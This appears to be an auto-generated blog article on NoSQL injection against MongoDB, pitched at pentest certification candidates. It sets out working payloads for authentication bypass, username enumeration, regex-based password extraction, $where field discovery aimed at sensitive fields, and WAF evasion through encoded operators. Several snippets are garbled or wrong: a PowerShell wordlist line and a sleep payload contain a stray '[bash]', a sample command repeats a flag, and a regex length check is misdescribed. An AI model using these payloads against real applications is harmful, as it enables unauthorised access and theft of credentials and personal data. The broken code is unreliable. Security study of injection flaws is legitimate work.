Listen to this Post
Introduction:
NoSQL injection has emerged as a critical web application vulnerability, paralleling traditional SQL injection threats in modern applications leveraging databases like MongoDB. While tools exist, many pentesters find existing solutions cumbersome or unreliable for consistent exploitation during certifications like the BSCP, leading to a demand for customizable, script-based approaches that provide greater control and understanding of the exploitation process.
Learning Objectives:
- Understand the fundamental mechanics of NoSQL injection attacks against MongoDB databases.
- Learn to deploy custom Python scripts for enumerating users, dumping passwords, and extracting document structures.
- Master operational security and methodology for adapting these scripts to diverse NoSQL environments and pentest scenarios.
You Should Know:
1. NoSQL Injection Fundamentals & Tool Limitations
NoSQL databases, particularly MongoDB, use query languages based on JSON-like documents rather than traditional SQL. Common injection points include login forms, API endpoints, and search functionalities that directly process user input into database queries without proper sanitization. While tools like NoSQLMap exist, they often lack reliability for specific pentest scenarios, fail against certain application logic, or don’t provide the granular control needed for certification exams and professional engagements.
The core vulnerability arises when user input is improperly concatenated into database queries. For example, a login handler might use code like:
query = {"username": request.json['username'], "password": request.json['password']}
user = db.users.find_one(query)
An attacker could bypass authentication by sending:
{"username": "admin", "password": {"$ne": "wrongpassword"}}
This makes the query match any document where the password is not “wrongpassword,” potentially granting unauthorized access.
2. Environment Setup and Script Configuration
Before exploitation, establish a proper testing environment. For practice, set up a vulnerable Node.js/MongoDB application or use dedicated vulnerable machines. The scripts require Python 3 with requests library installed.
Installation command:
pip3 install requests
Clone the repository from the provided GitHub link (after URL expansion):
git clone https://github.com/saledo/nosqli-scripts cd nosqli-scripts
Critical configuration areas in each script include:
- Target URL (ensure it’s authorized for testing)
- Headers (Content-Type, cookies, authentication tokens)
- Payload structures tailored to the vulnerable parameter
- Success/failure indicators in server responses
3. User Enumeration Through Conditional Responses
The user enumeration script works by injecting operators that create boolean conditions, then analyzing response differences to determine valid usernames.
Sample command execution:
python3 nosqli_user_enum.py -u http://target.com/api/login -d '{"username":"$USER$","password":"$PASSWORD$"}' -u users.txt
The script typically uses the `$regex` operator with systematic username testing:
payload = {"username": {"$regex": "^admin$"}, "password": {"$ne": ""}}
If the application returns a different HTTP status code (200 vs 401) or response length for valid versus invalid users, the script can identify existing accounts. Response analysis is crucial—some applications return generic errors but have subtle differences in timing, length, or hidden error messages.
4. Password Extraction Using Pattern Matching
Once valid usernames are identified, password extraction employs similar conditional logic with character-by-character reconstruction.
The script might use:
Check password length first
payload = {"username": "admin", "password": {"$regex": ".{20}"}}
Then extract characters
payload = {"username": "admin", "password": {"$regex": "^a"}} First character 'a'?
payload = {"username": "admin", "password": {"$regex": "^b"}} First character 'b'?
For optimized extraction, employ binary search techniques with character ranges:
payload = {"username": "admin", "password": {"$regex": "^[a-m]"}} First half of alphabet?
Windows PowerShell equivalent for creating custom wordlists:
1..10 | % { $length=$_; 65..90+97..122 | % { [bash]$_ } | % { "$_" $length } } | Out-File -FilePath patterns.txt
5. Document Field Discovery with $where Operator
MongoDB’s `$where` operator allows JavaScript expression execution, enabling attackers to discover document structure by testing field existence.
The script injects payloads like:
{"$where": "this.secret_field !== undefined"}
If the document contains ‘secret_field’, the query returns the document; otherwise, it doesn’t match. To systematically discover fields:
potential_fields = ["password", "ssn", "credit_card", "api_key", "token"]
for field in potential_fields:
payload = {'$where': f'this.{field} && true'}
response = requests.post(target_url, json=payload)
if "success_indicator" in response.text:
print(f"Field exists: {field}")
This approach bypasses schema restrictions since MongoDB is schemaless, but applications might still filter certain fields from output.
6. Bypassing Common Defenses and WAFs
Modern applications often implement Web Application Firewalls (WAFs) and input validation that block common NoSQL operators. Evasion techniques include:
- Encoding payloads (Unicode, hex, base64)
- Using alternative operator syntax
- Splitting operators across multiple parameters
- Adding comments or whitespace
Example with encoding:
Instead of direct $ne operator
payload = {"username": "admin", "password": {"\u0024ne": ""}}
Or with mixed encoding
payload = {"username": "admin", "password": {"$n\u0065": ""}}
Time-based detection bypass using sleep:
{"$where": "if (this.password[bash] == 'a') { sleep(5000); return true; } else { return false; }"}
7. Integrating with Burp Suite for Advanced Testing
While the post mentions limitations with Burp Suite alone, combining custom scripts with Burp’s proxy functionality creates a powerful workflow.
Configure Burp as a proxy for your Python scripts:
import requests
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
requests.post(target, json=payload, proxies=proxies, verify=False)
For Burp Intruder, create custom payload positions targeting JSON parameters:
{"username":"§admin§","password":{"$ne":"§invalid§"}}
Export results from Burp and process with your scripts for correlation analysis, or use Burp’s logger extension to capture all traffic from automated scripts for later review.
What Undercode Say:
- Custom scripting provides unparalleled adaptability for specific penetration testing scenarios where off-the-shelf tools fail, particularly during certification exams with unique constraints.
- Understanding the fundamental operators and injection techniques matters more than tool proficiency, as NoSQL implementations vary widely across different databases and application frameworks.
The decision to create custom scripts rather than relying solely on existing tools represents a maturation in penetration testing methodology. While automated tools provide broad coverage, targeted scripts offer precision and reliability for specific engagement requirements. This approach is particularly valuable for MongoDB environments where injection techniques differ significantly from traditional SQL. The scripts’ modular design allows pentesters to rapidly adapt to different application contexts, response patterns, and defensive measures. As NoSQL databases continue evolving, this foundational understanding of injection principles will remain valuable even as specific payloads require updating. The emphasis on the $where operator demonstrates advanced technique application beyond basic authentication bypass, enabling comprehensive document structure discovery that reveals sensitive data fields not apparent through normal application behavior.
Prediction:
NoSQL injection techniques will rapidly evolve as more applications migrate from traditional SQL databases, with defensive measures struggling to keep pace due to the flexibility and variation in NoSQL query languages. Within two years, we’ll see widespread adoption of NoSQL-specific WAF rules and developer education programs, but simultaneous emergence of new bypass techniques leveraging operator chaining, type confusion, and server-side JavaScript execution. The cybersecurity industry will likely develop standardized NoSQL injection detection and prevention frameworks, but the fundamental challenge of securing schemaless databases against injection will persist due to their inherent flexibility and the difficulty of implementing uniform input validation across diverse query patterns.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Sergio Aledo – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
